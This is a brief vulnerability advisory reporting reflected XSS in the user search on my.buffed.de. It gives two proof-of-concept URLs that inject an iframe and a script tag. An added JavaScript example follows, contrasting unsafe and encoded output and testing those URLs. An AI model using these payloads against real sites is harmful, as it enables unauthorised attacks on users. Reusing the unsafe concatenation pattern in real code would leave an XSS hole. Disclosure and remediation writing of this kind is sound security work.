#http://buffed.de XSS Vulnerability.
#Software/Web: http://buffed.de
#Found By: elric
#Exploit:

Various XSS holes in the user search on Buffed.de (http://my.buffed.de/)

HTML Inject: e.g. ">
Javascript Inject: e.g. ">
URL hacking: e.g.
http://my.buffed.de/search/users?search=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fgoogle.com%3EX%3C%2Fiframe%3E&=&pass123=&online_sort=&advanced=&show_limit=20&town=&plz=&country=&age_from=&age_to=&realm_id=1&faction=
http://my.buffed.de/search/users?search=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
etc. ..

*** Elbone Network - Security http://elbone.net
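
The fix for this class of bug is output encoding of the `search` parameter. The following is an added example, not code from the advisory or from buffed.de: it assumes the search term is echoed into the `value` attribute of the search box (which the `">` prefix of the payloads suggests), and the function names and the template are hypothetical.

```javascript
// Added illustration; template and function names are hypothetical.
// Assumption: the search term is reflected into value="..." of the search box.

// Encode the characters that can change parsing context in element
// content or inside a quoted attribute value.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: raw request data concatenated into markup.
function renderSearchBoxUnsafe(term) {
  return '<input type="text" name="search" value="' + term + '">';
}

// Hardened pattern: encode at the point of output.
function renderSearchBoxSafe(term) {
  return '<input type="text" name="search" value="' + escapeHtml(term) + '">';
}

// Decode the query string as a server framework would and return "search".
function searchTermFromUrl(url) {
  return new URL(url).searchParams.get('search') ?? '';
}

// A correctly rendered fragment is exactly one tag: the only '<' is the
// first character and the only '>' is the last. Anything else means the
// reflected value escaped the attribute.
function breaksOutOfAttribute(html) {
  return html.lastIndexOf('<') !== 0 || html.indexOf('>') !== html.length - 1;
}

// The two URLs from the advisory (the first cut down to its search parameter).
const ADVISORY_URLS = [
  'http://my.buffed.de/search/users?search=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fgoogle.com%3EX%3C%2Fiframe%3E',
  'http://my.buffed.de/search/users?search=%22%3E%3Cscript%3Ealert(1);%3C/script%3E',
];

for (const url of ADVISORY_URLS) {
  const term = searchTermFromUrl(url);
  console.log('decoded term :', term);
  console.log('unsafe output:', breaksOutOfAttribute(renderSearchBoxUnsafe(term)) ? 'markup injected' : 'ok');
  console.log('safe output  :', breaksOutOfAttribute(renderSearchBoxSafe(term)) ? 'markup injected' : 'ok');
}
```

The same encoding has to be applied everywhere the parameter is reflected, not only in the input field.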